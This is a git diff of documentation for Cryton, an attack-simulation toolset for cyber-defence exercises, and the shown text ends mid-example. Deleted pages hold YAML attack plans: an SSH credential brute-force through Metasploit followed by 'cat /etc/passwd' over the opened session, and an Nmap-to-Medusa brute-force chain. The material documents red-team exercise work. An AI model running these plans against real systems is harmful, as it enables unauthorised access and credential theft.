diff --git a/.gitlab-ci.yml b/.gitlab-ci.yml index 50d07095c5484b57ff2d68f357ad43f3688a1895..578d3db45d015f8b52de524e3eef225af57904de 100644 --- a/.gitlab-ci.yml +++ b/.gitlab-ci.yml @@ -11,6 +11,7 @@ stages: check_build: stage: test + image: registry.gitlab.ics.muni.cz:443/cryton/configurations/ci-base:latest before_script: - poetry install script: diff --git a/README.md b/README.md index 241bfc95e28ca424a6f059420573d1d561c7cb3e..d7f27a822a78906af4324645965edd9ebeec85d8 100644 --- a/README.md +++ b/README.md @@ -3,16 +3,7 @@ # Cryton documentation ## Description -Cryton is a breach Emulation & Attack Simulation Toolset. -It is a set of tools for complex attack scenarios' automation. Through usage of core and attack modules it provides ways -to plan, execute and evaluate multistep attacks. - -There are 5 main separate projects of Cryton toolset: -- **[Cryton Core](https://gitlab.ics.muni.cz/cryton/cryton-core)**: Contains Cryton Core functionality for working with database, task scheduler and execution mechanisms. -- **[Cryton Worker](https://gitlab.ics.muni.cz/cryton/cryton-worker)**: Contains functionality to execute attack modules both locally and remotely. -- **[Cryton Modules](https://gitlab.ics.muni.cz/cryton/cryton-modules)**: Contains attack modules that can be executed via Worker. -- **[Cryton CLI](https://gitlab.ics.muni.cz/cryton/cryton-cli)**: Command Line Interface for working with Cryton. It uses REST API, which is part of *Cryton Core*. -- **[Cryton Frontend](https://gitlab.ics.muni.cz/cryton/cryton-frontend)**: Graphical Interface for working with Cryton. It also utilizes REST API. +This project provides documentation for the Cryton toolset. [Link to the documentation](https://cryton.gitlab-pages.ics.muni.cz/cryton-documentation/). @@ -35,8 +26,6 @@ To spawn a shell use: poetry shell ``` -Everything should be set, check out the [usage section](#usage). - ## Usage To build the documentation, run: ``` diff --git a/docs/2022.2/architecture.md b/docs/2022.2/architecture.md deleted file mode 100644 index c1f003c8139abfea6c3420c1477ff2b1074591b5..0000000000000000000000000000000000000000 --- a/docs/2022.2/architecture.md +++ /dev/null @@ -1,32 +0,0 @@ - - -## Core -All main functionality is implemented in Cryton Core. As the name suggests, this is the core component of the Cryton toolset. It provides all the functionality for parsing the attack Plan(s), creation of Executions, and scheduling (executing) of Runs. - -For issuing commands to Core, REST API allows HTTP requests and is utilized by CLI or Frontend for user interactions. - -## CLI and Frontend -There are two ways to interact with Cryton or, more precisely, to use its API. One of them is Cryton CLI, a python script that we can use to run actions from the terminal simply. A slightly more user-friendly is Cryton Frontend, a graphical web interface providing additional functionality to improve the user experience and make the automation process smoother. It uses Cryton Core's REST API as well. - -There is also the option to develop a completely custom application that will send HTTP requests to Cryton's REST API. If you are interested, you can find more about Cryton's REST API [here](interfaces/core-rest-api.md). - -## Worker -Cryton Core cannot act without Cryton Worker. In other words, Cryton Core creates messages that worker(s) consume, telling them what to do and when. - -Cryton Worker is a component for executing attack modules remotely. It utilizes Rabbit MQ as its asynchronous remote procedures call protocol. It connects to the Rabbit MQ server and consumes messages from the Core component or any other app that implements its Rabbit API. - -## Modules -For the Cryton Worker to perform specific actions tied to some known offensive security tool such as Metasploit, it needs to have installed Cryton Modules implementing their functionality in advance so the worker can use them. - -For example, we can have the Nmap module that implements the scanning capabilities of the Nmap tool or a module that implements the attacking abilities of Medusa brute force. These, among others, are in the form of Python scripts and are available from the Cryton developers. Moreover, you can [develop](modules/howto-create-attack-modules.md) other modules according to your needs. - -## Do I need to have all components installed? -If you are starting with Cryton, you should install all the main components - CLI, Core, Worker, and modules. - -Depending on your use case, the composition of Cryton may vary. For example, installing the Frontend is unnecessary if you wish to control Cryton using only the CLI. - -Further, worker(s) can be remotely controlled and installed on different machines than the Cryton Core. -Also, the package of modules you want to work with may vary depending on the attack scenarios. - -Moreover, it is also possible to use Cryton Worker as a standalone application and control it using your own requests -and receive responses on a custom queue. (for more information, visit [this](interfaces/worker-rabbit-api.md) section). diff --git a/docs/2022.2/designing-phase/session-management.md b/docs/2022.2/designing-phase/session-management.md deleted file mode 100644 index fb7c1a82a6da51d885f4b90cca3a3070cdb1680f..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/session-management.md +++ /dev/null @@ -1,66 +0,0 @@ -One of the unique features of Cryton is the ability to create and use *sessions* - connections to the target systems. -When you successfully exploit a running network service on your target machine (victim), you open a connection to it. -In Cryton, this connection can be given a name and then used during the Plan execution in any Step (which is executed -on the same Worker node and supports this functionality). Metasploit Framework session management is used for storing -and interacting with sessions, and therefore must be available and running on the Worker node. - -```yaml -- name: step1 - arguments: - create_named_session: session_to_target_1 - ... -- name: step2 - arguments: - use_named_session: session_to_target_1 - ... -``` - -In the example above, step1 creates a named session *session_to_target_1* (in case it succeeds). -Its Metasploit ID gets stored in the database and can be used anywhere in the Plan, not only in the following Step -(as seen in the example). When the Plan creates multiple sessions to the same target, and the attacker does not care which -he is using, the *use_any_session_to_target* parameter can be used. - -```yaml -- name: step1 - arguments: - use_any_session_to_target: 192.168.56.22 - ... -``` - -## Plan example -```yaml ---- -plan: - name: Session example - owner: test name - stages: - - name: stage-one - trigger_type: delta - trigger_args: - seconds: 5 - steps: - - name: ssh-session - is_init: true - step_type: worker/execute - arguments: - create_named_session: session_to_target_1 - module: mod_msf - module_arguments: - exploit: auxiliary/scanner/ssh/ssh_login - exploit_arguments: - RHOSTS: 127.0.0.1 - USERNAME: vagrant - PASSWORD: vagrant - next: - - type: result - value: OK - step: session-cmd - - name: session-cmd - step_type: worker/execute - arguments: - use_named_session: session_to_target_1 - module: mod_cmd - module_arguments: - cmd: cat /etc/passwd - -``` diff --git a/docs/2022.2/designing-phase/template.md b/docs/2022.2/designing-phase/template.md deleted file mode 100644 index 9645e5e4a945bb6d1d5b7bdc8d0f67e91b12a168..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/template.md +++ /dev/null @@ -1,21 +0,0 @@ -The most important part is creating a plan template. This is basically a Plan object written in YAML format. You can find a -detailed description of this format in section [Plan](plan.md). - - - -Template itself is not a fully described attack scenario. The structure of the Attack (execution tree) is correct, -but there are still unfilled places (e.g. IP addresses of targets or some other [inventory variables](plan-instance.md#inventory-files)). -This way an Attack Template can be designed before knowing these details and used in multiple different environments. - -The first step in designing a Plan (attack scenario) is creating a template. In this step the user is supposed to -write the whole scenario in the form of Plan, Stages and Steps. - -An abstract Plan can look like this: -```yaml -Plan - Stage 1 - Step 1 - Step 2 - Stage 2 - Step 3 -``` diff --git a/docs/2022.2/designing-phase/what-is-attack-scenario.md b/docs/2022.2/designing-phase/what-is-attack-scenario.md deleted file mode 100644 index 5e7641c65989e90dc4d9f05bafeae986ad2e34de..0000000000000000000000000000000000000000 --- a/docs/2022.2/designing-phase/what-is-attack-scenario.md +++ /dev/null @@ -1,17 +0,0 @@ -Let's start with the description of the attack scenario. I use attack scenario and Plan interchangeably - Plan is just -the name of the element in the formal description of the attack scenario. - -An attack scenario is a sequence of steps with some common objective. This objective may be data exfiltration, access to -target systems, denial of service, or any other harmful action. For some exercises, every attack should be -divisible into different stages. Imagine you have to attack infrastructure with multiple machines - each machine can -be a separate stage. Or you want to attack according to some kill-chain, e.g. the first stage would be scanning of the -infrastructure, the second is brute force attack on credentials to found systems, etc. - -The last and most important element of the Plan description is the attack step. This is the execution of an attack script or tool -against the target. A step can be running a Metasploit exploit, or running a Nmap scan. Steps are dependent on each other, -and so they create an execution tree, where each of them has set the list of successors based on some condition. The -condition may be a success or a string value returned by its predecessor. - -Putting this all together you get the whole attack scenario (called **Plan**), which is divided into different stages -(called **Stage**). Every stage is set to run at a specific time, as this is often required by the exercise. And finally, each -stage consists of attack steps (called **Step**), which are organized in a non-binary tree described above. diff --git a/docs/2022.2/dynamic-execution.md b/docs/2022.2/dynamic-execution.md deleted file mode 100644 index 559903d7335d040f0be7a7b9f089da8c93d6693f..0000000000000000000000000000000000000000 --- a/docs/2022.2/dynamic-execution.md +++ /dev/null @@ -1,249 +0,0 @@ -To support dynamic security testing. We've added support for creating dynamic plans. They allow the user to -create an empty Plan/Stage and create their agent to control the execution instead of Cryton's advanced scheduler. - -## Features -- Create a Plan/Step/Stage for dynamic execution (an empty list of Stages/Steps can be provided) -- Add Step to Stage execution and execute it -- Add Stage to Plan execution and start it -- Added Steps are automatically set as a successor of the last Step (only if the `is_init` variable is **not** set to *True* and a possible parent Step exists) - -## Limitations -- Dynamic plan must have a `dynamic` variable set to *True* -- If you don't want to pass any Stages/Steps you must provide an empty list -- Each Stage and Step must have a unique name in the same Plan (utilize [inventory variables](designing-phase/plan-instance.md#inventory-files) to overcome this limitation) -- The Stage/Step you're trying to add must be valid -- Run's Plan must contain the instance (Stage/Step) you are trying to execute -- You cannot create multiple executions for an instance (you can execute an instance only once) under the same Plan execution - -## Workflow example (using CLI) -For this example we will assume that: - -- Cryton Core is running (REST API is accessible at *localhost:8000*) -- Worker is registered in Core and running -- mod_cmd is accessible from the Worker - -If it isn't the case, feel free to follow the [installation example](getting-started/installation-example.md). - -Files used in this guide can be found in the [Cryton Core repository](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/stable/2022.2/examples/dynamic-execution-example). - -It's best to switch to the example directory, so we will assume that's true. -``` -cd /path/to/cryton-core/examples/dynamic-execution-example/ -``` - -### Building a base Plan and executing it -First, we create a template -``` -cryton-cli plan-templates create template.yml -``` - -Create a Plan (instance) -``` -cryton-cli plans create <template_id> -``` - -Add a Stage to the Plan (update the inventory file to your needs) -``` -cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml -``` - -Add an initial Step to the Stage -``` -cryton-cli steps create <stage_id> step-init.yml -``` - -Add a reusable Step to the Stage (update the inventory file to your needs) -``` -cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml -``` - -Create a Worker you want to test on -``` -cryton-cli workers create local -``` - -Create a Run -``` -cryton-cli runs create <plan_id> <worker_id> -``` - -Execute the Run -``` -cryton-cli runs execute <run_id> -``` - -### Start standalone Stage: -Add your Stage to the desired Plan (**Update the inventory file! Stage names must be unique.**) -``` -cryton-cli stages create <plan_id> stage.yml -i stage-inventory.yml -``` - -Start your Stage (its trigger) under the desired Plan execution -``` -cryton-cli stages start-trigger <stage_id> <plan_execution_id> -``` - -### Execute standalone Step: -Add your Step to the desired Stage (**Update the inventory file! Step names must be unique.**) -``` -cryton-cli steps create <stage_id> step-reusable.yml -i step-reusable-inventory.yml -``` - -Execute your Step under the desired Stage execution -``` -cryton-cli steps execute <step_id> <stage_execution_id> -``` - -### Check results - works only once the Run is created: -``` -cryton-cli runs report 1 --less -``` - -## Automation using Python -You will probably want to automate these actions rather than using CLI to do them. For this purpose, we will create a simple -Python script that will: - -1. Create a template -2. Create a Plan -3. Add a Stage -4. Add a Step -5. Create a Run -6. Execute the Run -7. Create a new Step -8. Execute the new Step -9. Get the Run report - -For this example we will assume that: - -- Cryton Core is running (REST API is accessible at *localhost:8000*) -- Worker is registered in Core and running -- mod_cmd is accessible from the Worker - -If it isn't the case, feel free to follow the [installation example](getting-started/installation-example.md). - -Once we have met all the requirements, we can copy the following script, **update the `WORKER_ID` variable**, and run it -using `python3 my_automation_script.py`. - -```python -import requests -import yaml -import time - -WORKER_ID = 0 - -TEMPLATE = { - "plan": { - "name": "example", - "owner": "Cryton", - "dynamic": True, - "stages": [] - } -} - -STAGE = { - "name": "no delay stage {{ id }}", - "trigger_type": "delta", - "trigger_args": { - "seconds": 0 - }, - "steps": [] -} - -STEP = { - "name": "initial step", - "step_type": "worker/execute", - "is_init": True, - "arguments": { - "module": "mod_cmd", - "module_arguments": { - "cmd": "whoami" - } - } -} - -STEP_REUSABLE = { - "name": "reusable step {{ id }}", - "step_type": "worker/execute", - "arguments": { - "module": "mod_cmd", - "module_arguments": { - "cmd": "{{ command }}" - } - } -} - - -def get_api_root(): - api_address = "localhost" - api_port = 8000 - return f"http://{api_address}:{api_port}/api/" - - -if __name__ == "__main__": - # Check if the Worker is specified - if WORKER_ID < 1: - raise Exception("Please specify a correct Worker ID at the top of the file.") - print(f"Worker id: {WORKER_ID}") - - # Get api root - api_root = get_api_root() - - # 1. Create a template - r_create_template = requests.post(f"{api_root}templates/", files={"file": yaml.dump(TEMPLATE)}) - template_id = r_create_template.json()['id'] - print(f"Template id: {template_id}") - - # 2. Create a Plan - r_create_plan = requests.post(f"{api_root}plans/", data={'template_id': template_id}) - plan_id = r_create_plan.json()['id'] - print(f"Plan id: {plan_id}") - - # 3. Add a Stage - stage_inventory = {"id": 1} - r_create_stage = requests.post(f"{api_root}stages/", data={'plan_id': plan_id}, - files={"file": yaml.dump(STAGE), "inventory_file": yaml.dump(stage_inventory)}) - stage_id = r_create_stage.json()['id'] - print(f"Stage id: {stage_id}") - - # 4. Add a Step - r_create_step = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, files={"file": yaml.dump(STEP)}) - step_id = r_create_step.json()['id'] - print(f"Step id: {step_id}") - - # 5. Create a new Run - r_create_run = requests.post(f"{api_root}runs/", data={'plan_id': plan_id, "worker_ids": [WORKER_ID]}) - run_id = r_create_run.json()["id"] - print(f"Run id: {run_id}") - - # 6. Execute the Run - r_execute_run = requests.post(f"{api_root}runs/{run_id}/execute/", data={'run_id': run_id}) - print(f"Run response: {r_execute_run.text}") - - # 7. Create a new Step - step_inventory = {"id": 1, "command": "echo test"} - r_create_step2 = requests.post(f"{api_root}steps/", data={'stage_id': stage_id}, - files={"file": yaml.dump(STEP_REUSABLE), - "inventory_file": yaml.dump(step_inventory)}) - step_id2 = r_create_step2.json()['id'] - print(f"Second step id: {step_id2}") - - # 8. Execute the new Step (First, get Stage execution's id) - stage_execution_id = requests.get(f"{api_root}runs/{run_id}/report/")\ - .json()["detail"]["plan_executions"][0]["stage_executions"][0]["id"] - r_execute_step = requests.post(f"{api_root}steps/{step_id2}/execute/", - data={'stage_execution_id': stage_execution_id}) - print(f"Second Step response: {r_execute_step.text}") - - # 9. Get Run report - for i in range(5): - time.sleep(3) - current_state = requests.get(f"{api_root}runs/{run_id}/").json()["state"] - if current_state == "FINISHED": - break - print(f"Waiting for a final state. Current state: {current_state}") - - print() - print("Report: ") - print(yaml.dump(requests.get(f"{api_root}runs/{run_id}/report/").json()["detail"])) - -``` \ No newline at end of file diff --git a/docs/2022.2/getting-started/installation-example.md b/docs/2022.2/getting-started/installation-example.md deleted file mode 100644 index d3c6b45153dfecfb42dd18e4a4e47a36a31f59c1..0000000000000000000000000000000000000000 --- a/docs/2022.2/getting-started/installation-example.md +++ /dev/null @@ -1,124 +0,0 @@ -# Installation example (local deployment) -This example will walk you through the installation of all Cryton components (locally), including the default attack modules. -However, we will only change the necessary settings, since this is primarily a showcase installation. -For Cryton to work correctly, **be strict about the order of components installation to preserve dependencies**. - -We will use **pipx** to install CLI and Worker with modules, and **Docker Compose** to install Core. - -Please make sure you are using a system that has at least 2048 MB of RAM and 2 CPU cores, otherwise you might experience stability issues. - -## Install prerequisites -The following packages might be missing on your system and are **necessary**: - -- *python3-pip* -- *python3-venv* - -Make sure you have installed and set up correctly the following tools: - -- [pipx](https://pypa.github.io/pipx/) (requires restarting terminal session) -- [curl](https://curl.se/) -- [Docker Compose](https://docs.docker.com/compose/install/) (requires system reboot) -- [git](https://git-scm.com/) - -Also make sure the directory `~/.local/` exists, since we will be using it for the installation. -```shell -mkdir -p ~/.local/ -``` - -## Install CLI -More information can be found in the [starting point](../starting-point/cli.md). - -First, we create an application directory and save settings into it. We will install the CLI afterward. -```shell -cd ~/.local/ -mkdir -p ~/.local/cryton-cli/ -curl -o ~/.local/cryton-cli/.env https://gitlab.ics.muni.cz/cryton/cryton-cli/-/raw/stable/2022.2/.env -pipx install cryton-cli -``` - -## Install and run Frontend (optional) -More information can be found in the [starting point](../starting-point/frontend.md). - -First, we clone the repository and checkout the correct version. -Finally, we install and start Cryton Core and all necessary services (RabbitMQ, Postgres, PgBouncer). -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git -cd cryton-frontend -git checkout stable/2022.2 -sudo docker compose up -d --build -``` - -## Install and run Core -More information can be found in the [starting point](../starting-point/core.md). - -First, we clone the repository and checkout the correct version. -Finally, we install and start Cryton Core and all necessary services (RabbitMQ, Postgres, PgBouncer). -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -git checkout stable/2022.2 -sudo docker compose -f docker-compose.yml -f docker-compose.prerequisites.yml up -d --build -``` - -## Download modules -More information can be found in the [starting point](../starting-point/modules.md). - -First, we clone the repository and checkout the correct version. -Afterward, we export a variable containing the path to the modules. -```shell -cd ~/.local/ -git clone https://gitlab.ics.muni.cz/cryton/cryton-modules.git -cd cryton-modules -git checkout stable/2022.2 -export CRYTON_MODULES_PATH=$(pwd)/modules -``` - -## Install and run Worker -More information can be found in the [starting point](../starting-point/worker.md). - -First, we create an application directory, download settings, and update them. We will install the Worker afterward. -```shell -cd ~/.local/ -mkdir -p ~/.local/cryton-worker/ -curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/stable/2022.2/.env -sed -i "s|CRYTON_WORKER_MODULES_DIR=CHANGE_ME|CRYTON_WORKER_MODULES_DIR=$CRYTON_MODULES_PATH|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_NAME=CHANGE_ME|CRYTON_WORKER_NAME=LocalWorker|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_INSTALL_REQUIREMENTS=false|CRYTON_WORKER_INSTALL_REQUIREMENTS=true|" ~/.local/cryton-worker/.env -sed -i "s|CRYTON_WORKER_RABBIT_HOST=CHANGE_ME|CRYTON_WORKER_RABBIT_HOST=localhost|" ~/.local/cryton-worker/.env -pipx install cryton-worker -``` - -To start the worker use: -```shell -cryton-worker start -``` - -If you want to run the Worker in the background use: -```shell -nohup cryton-worker start > ~/.local/cryton-worker/std_out 2>&1 & -``` - -### Kill Worker running in the background -You might want to shut down the Worker, when you're now using it or want to change the settings. -Make sure you kill both of the created processes. -```shell -ps -aux | grep cryton-worker -kill <PID> <PID> -``` - -## Test the installation -Now we want to test if the CLI, Worker, and Core are communicating. - -Open a new terminal Window. - -Create (register) your Worker (the following command will return an ID in the response): -```shell -cryton-cli workers create LocalWorker -d "my local worker for testing" -``` - -Check if the Worker is reachable (replace the **id** parameter with the ID from the previous command): -```shell -cryton-cli workers health-check <id> -``` diff --git a/docs/2022.2/getting-started/workflow-example.md b/docs/2022.2/getting-started/workflow-example.md deleted file mode 100644 index f0f36bc835797a96b0ea29d2c8bdcb4346d0284b..0000000000000000000000000000000000000000 --- a/docs/2022.2/getting-started/workflow-example.md +++ /dev/null @@ -1,268 +0,0 @@ -## Prerequisites -Before you start with this example, it is assumed that: - -- [Core](../starting-point/core.md) is installed and running. -- [CLI](../starting-point/cli.md) is already installed. -- [Worker](../starting-point/worker.md) is already installed and running. -- [Modules](../starting-point/modules.md) are mounted to Worker. -- [Nmap](https://www.kali.org/tools/nmap/) and [Medusa](https://www.kali.org/tools/medusa/) tools are installed and accessible from Worker. -- Core and CLI are installed on the same machine. If not, see the Cryton CLI [settings](../starting-point/cli.md#settings) -or [usage](../starting-point/cli.md#usage) section to connect cryton-cli to cryton-core. - -If you haven't installed the Cryton toolset already, feel free to follow the [installation example](installation-example.md). - -## Cryton attack workflow -The following is the ideal sequence of steps to use when planning an attack and using Cryton to automate it. -First, you need to prepare an infrastructure for your cyber defense exercise. Once you have it, you can start planning your attack: - -1. Create an [attack plan template](../designing-phase/template.md). -2. Install and set up Core, CLI/Frontend. -3. Set up your Workers (one for each team): - - Download and mount the required modules for the plan. - - Install module prerequisites (attack tools, system requirements). - - Update the Worker settings and start it (Python dependencies can be installed on Worker startup). -4. Register Workers and create Run from the attack plan. -5. Execute or schedule the Run. - -## Create plan template -To execute our attack plan, we must create its [template](../designing-phase/template.md) (YAML) first – a description -of the actions required to run during attack execution based on tools used during the attack. - -We will be using a basic template example, which can be found -[here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tree/stable/2022.2/examples) as well as other examples. - -```yaml ---- -# This is a simple example of Step chaining. -# Required modules: mod_cmd, mod_medusa. - -plan: - name: Basic example - owner: Cryton - stages: - - name: get-localhost-credentials - trigger_type: delta - trigger_args: - seconds: 0 - steps: - - name: check-ssh - is_init: true - step_type: worker/execute - arguments: - module: mod_nmap - module_arguments: - target: {{ target }} - ports: - - 22 - next: - - type: result - value: OK - step: bruteforce - - name: bruteforce - step_type: worker/execute - arguments: - module: mod_medusa - module_arguments: - target: {{ target }} - credentials: - username: {{ bruteforce.username }} - password: {{ bruteforce.password }} - -``` - -Once we are satisfied with our template, we can upload it using CLI: -```shell -cryton-cli plan-templates create path/to/template.yml -``` - -**Example:** -```shell -cryton-cli plan-templates create cryton-core/examples/basic-example/template.yml -Template successfully created! ({'id': 1}) -``` - -### Validating plan template -Before we upload the template, we should validate it. However, for our template to be validated correctly, -we have to provide an inventory file, which is described [here](#create-plan-instance). Once we have it, we can simply run: -```shell -cryton-cli plans validate path/to/template.yml -i path/to/my/inventory-file.yml -``` - -**Example:** -```shell -cryton-cli plans validate cryton-core/examples/basic-example/template.yml -i cryton-core/examples/basic-example/inventory.yml -Plan successfully validated! (<response>) -``` - -## Set up Worker(s) -**Notice:** If you've set up Cryton using the [installation example](installation-example.md), -and you're not using it for production, you can skip this section. - -Check if the Workers have the correct [settings](../starting-point/worker.md#settings), -mainly `CRYTON_WORKER_RABBIT_*`, `CRYTON_WORKER_NAME`, and `CRYTON_WORKER_MODULES_DIR`. - -Use the `--install-requirements` (`-I`) flag to install the requirements (python dependencies) at startup. - -If everything is set, you can start each worker: -```shell -cryton-worker start -``` - -If you want to run the Worker in the background use: -```shell -nohup cryton-worker start > ~/.local/cryton-worker/std_out 2>&1 & -``` - -**Notice:** If you're using Docker Compose to install and run Worker, and you've changed the settings, you have to restart the container. - -At this point, our worker is active and awaiting messages from Core. However, to be able to use it, we have to register it in Core's database. -We can do that using CLI (repeat for each Worker). Keep in mind that **WORKER_NAME** must -be the same as Worker’s `CRYTON_WORKER_NAME` variable: - -```shell -cryton-cli workers create <WORKER_NAME> -d <WORKER_DESCRIPTION> -``` - -**Example:** -```shell -cryton-cli workers create unique-name -d "kali-worker1 on 192.168.56.101" -Worker successfully created! ({'id': 1}) -``` - -To check if the Workers are running use a health check (repeat for each Worker): -```shell -cryton-cli workers health-check <WORKER_ID> -``` - -**Example:** -```shell -cryton-cli workers health-check 1 -The Worker successfully checked! (<response>) -``` - -## Create Plan instance -Now we need to create a Plan instance we will use for the execution. We can create it using the combination of -the previously uploaded template and an [inventory file](../designing-phase/plan-instance.md#inventory-files). - -Create the following inventory file: -```yaml ---- -target: 127.0.0.1 -bruteforce: - username: my_user - password: my_pass - -``` - -If you haven't uploaded the template, because you want to **validate it first**, see [this](#validating-plan-template) section. - -To create a new Plan instance use: -```shell -cryton-cli plans create <TEMPLATE_ID> -i path/to/my/inventory-file.yml -``` - -**Example:** -```shell -cryton-cli plans create 1 -i cryton-core/examples/basic-example/inventory.yml -Plan Instance successfully created! ({'id': 1}) -``` - -## Create Run -The last step we have to make is to create a new [Run](../execution-phase/run.md) from the previously created Plan instance -and Worker(s). To do so, use: -```shell -cryton-cli runs create <PLAN_INSTANCE_ID> <WORKER_ID1> <WORKER_ID2> <WORKER_ID3> ... -``` - -**Example:** -```shell -cryton-cli runs create 1 1 2 3 -Run successfully created! ({'id': 1}) -``` - -## Execute Run -Now that everything is prepared, we can execute our Run immediately or schedule it for later. To execute the Run immediately, use: -```shell -cryton-cli runs execute <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs execute 1 -Run successfully executed! (Run 1 was executed.) -``` - -## Schedule Run -Run executions can be scheduled to a specific date and time. By default, the system timezone will be used. To use UTC timezone, use the `--utc-timezone` flag. -```shell -cryton-cli runs schedule <RUN_ID> <DATE> <TIME> -``` - -**Example:** -```shell -cryton-cli runs schedule 1 2020-06-08 10:00:00 -Run successfully scheduled! (Run 1 is scheduled for 2020-06-08 10:00:00.) -``` - -## Pause/Resume Run -In case you need to pause a Run in progress use: -```shell -cryton-cli runs pause <RUN_ID> -``` - -**Example**: -```shell -cryton-cli runs pause 1 -Run successfully paused! (Run 1 was paused.) -``` - -Run will be paused after all the running Steps finish. - -To resume the execution use: -```shell -cryton-cli runs resume <RUN_ID> -``` - -**Example**: -```shell -cryton-cli runs resume 1 -Run successfully resumed! (Run 1 was resumed.) -``` - -## Report results -It is crucial to know the current state of your Run and its results. That is why a report can be generated anytime during the execution. - -### Show Run information -To see if the executed Run has finished, you can check its state (and other useful information): -```shell -cryton-cli runs show <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs show 1 -id: 1, schedule_time: None, start_time: 2021-05-24T00:08:45.200025, pause_time: None, finish_time: 2021-05-24T00:09:18.397199, state: RUNNING -``` - -### View report -Reports can be viewed directly in cryton-cli (**to quit, press Q**): -```shell -cryton-cli runs report <RUN_ID> --less -``` - -**Example:** -```shell -cryton-cli runs report 1 --less -``` - -### Generate report -You can also save the report into a file: -```shell -cryton-cli runs report <RUN_ID> -``` - -**Example:** -```shell -cryton-cli runs report 1 -Successfully created Run's report! (file saved at: /tmp/report_run_1_2020-06-08-10-15-00-257994_xdQeV) -``` diff --git a/docs/2022.2/logging.md b/docs/2022.2/logging.md deleted file mode 100644 index 306c499c7358f91acd1c604462016f0c3f0401fe..0000000000000000000000000000000000000000 --- a/docs/2022.2/logging.md +++ /dev/null @@ -1,41 +0,0 @@ -The logs adhere to the following format: -``` -{"queue": "cryton_core.control.request", "event": "Queue declared and consuming", "logger": "cryton-debug", "level": "info", "timestamp": "2021-05-18T11:19:20.012152Z"} -{"plan_name": "Example scenario", "plan_id": 129, "status": "success", "event": "plan created", "logger": "cryton", "level": "info", "timestamp": "2021-05-18T06:17:39.753017Z"} -``` - -When running in Docker, you can always check the logs by: -``` -docker logs CONTAINER_NAME -``` - -## Core -Every change of state is logged for later analysis. Every Step the result is also logged, although -output is not. It can be found in the database. - -### Loggers -You can choose from two loggers - **debug** or **production**, which you can set by environment variable *CRYTON_CORE_DEBUG*. - -For **production**: -- RotatingFileHandler *CRYTON_CORE_APP_DIRECTORY*/log/cryton-core.log - -For **debug**: -- RotatingFileHandler *CRYTON_CORE_APP_DIRECTORY*/log/cryton-core-debug.log -- Console (std_out) - -For running tests the **cryton-core-test** logger is used. - -## Worker -Each request and its processing are logged for later analysis. - -### Loggers -You can choose from two loggers - **debug** or **production**, which you can set by environment variable *CRYTON_WORKER_DEBUG*. - -For **production**: -- RotatingFileHandler *CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker.log - -For **debug**: -- RotatingFileHandler *CRYTON_WORKER_APP_DIRECTORY*/log/cryton-worker-debug.log -- Console (std_out) - -For running tests the **cryton-worker-test** logger is used. diff --git a/docs/2022.2/modules/howto-create-attack-modules.md b/docs/2022.2/modules/howto-create-attack-modules.md deleted file mode 100644 index 7762428f74aa0b356e7f40abd7ecef04e1e9831a..0000000000000000000000000000000000000000 --- a/docs/2022.2/modules/howto-create-attack-modules.md +++ /dev/null @@ -1,140 +0,0 @@ -In this section, we will discuss best practices and some rules that each module must follow. - -To understand what a module is, please see the description [here](../starting-point/modules.md). - -Here's an example of a typical module directory: -``` -my_module_name/ -├── mod.py -├── test_mod.py -├── README.md -├── requirements.txt -└── example.py -``` - -### mod.py -The most important file is the module itself (**must be called `mod.py`**). It consists of two main methods: -- `execute` (is used as an entry point for module execution; takes and returns **dictionary**) -- `validate` (is used to validate input parameters for the `execute` method; takes **dictionary** and returns 0 if it's okay, else raises an exception) - -The [input](https://gitlab.ics.muni.cz/cryton/cryton-worker#input-parameters) -and [output](https://gitlab.ics.muni.cz/cryton/cryton-worker#output-parameters) are specified in Worker. - -You can also use [prebuilt functionality](https://gitlab.ics.muni.cz/cryton/cryton-worker#prebuilt-functionality-for-modules) from Worker. - -Here's a simple example: -```python -def validate(arguments: dict) -> int: - if arguments != {}: - return 0 # If arguments are valid. - raise Exception("No arguments") # If arguments aren't valid. - -def execute(arguments: dict) -> dict: - # Do stuff. - return {"return_code": 0, "serialized_output": ["x", "y"]} - -``` - -And also a bit more complex example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import File - - -def validate(arguments: dict) -> int: - """ - Validate input arguments for the execute function. - :param arguments: Arguments for module execution - :raises: schema.SchemaError - :return: 0 If arguments are valid - """ - conf_schema = Schema({ - 'path': File(str), - }) - - conf_schema.validate(arguments) - return 0 - - -def execute(arguments: dict) -> dict: - """ - This attack module can read a local file. - Detailed information should be in README.md. - :param arguments: Arguments for module execution - :return: Generally supported output parameters (for more information check Cryton Worker README.md) - """ - # Set default return values - ret_vals = { - "return_code": -1, - "serialized_output": {}, - "output": "" - } - - # Parse arguments - path_to_file = arguments.get("path") - - try: # Try to get file's content - with open(path_to_file) as f: - my_file = f.read() - except IOError as ex: # In case of fatal error (expected) update output - ret_vals.update({'output': str(ex)}) - return ret_vals - - # In case of success update return_code to 0 (OK) and send the file content to the worker - ret_vals.update({"return_code": 0}) - ret_vals.update({'output': my_file}) - - return ret_vals - -``` - -### test_mod.py -Contains a set of tests to check if the code is correct. - -Here's a simple example: -```python -from mod import execute - - -class TestMyModuleName: - def test_mod_execute(self): - arguments = {'cmd': "test"} - - result = execute(arguments) - - assert result == {"return_code": 0} - -``` - -### README.md -README file should describe what the module is for, and its IO parameters, and give the user some examples. - -It should also say what system requirements are necessary (with version). - -### requirements.txt -Here are specified Python packages that are required to run the module. These requirements must be compliant with the -Python requirements in Cryton Worker. - -For example, if the module wants to use the `schema` package with version *2.0.0*, but the Worker requires version *2.1.1*, it won't work. - -### example.py -Is a set of predefined parameters that should allow the user to test if the module works as intended. - -Example: - -```python -from mod import execute, validate - -args = { - "argument1": "value1", - "argument2": 